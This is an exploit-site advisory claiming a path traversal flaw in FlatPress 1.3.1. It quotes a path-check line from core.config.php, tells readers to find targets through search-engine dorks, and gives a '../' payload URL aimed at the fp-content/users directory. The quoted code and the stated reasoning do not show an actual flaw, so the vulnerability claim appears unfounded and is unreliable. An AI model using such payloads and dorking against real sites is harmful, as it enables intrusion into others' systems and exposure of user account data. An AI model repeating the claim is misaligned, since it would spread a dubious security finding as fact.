Headline
FlatPress 1.3.1 Path Traversal
FlatPress version 1.3.1 suffers from a path traversal vulnerability.
=============================================================================================================================================| # Title : FlatPress 1.3.1 Path Validation Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php if ($fullpath[0] != '/') trigger_error('config_read: syntax error. Path must begin with a /'); [+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error. While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================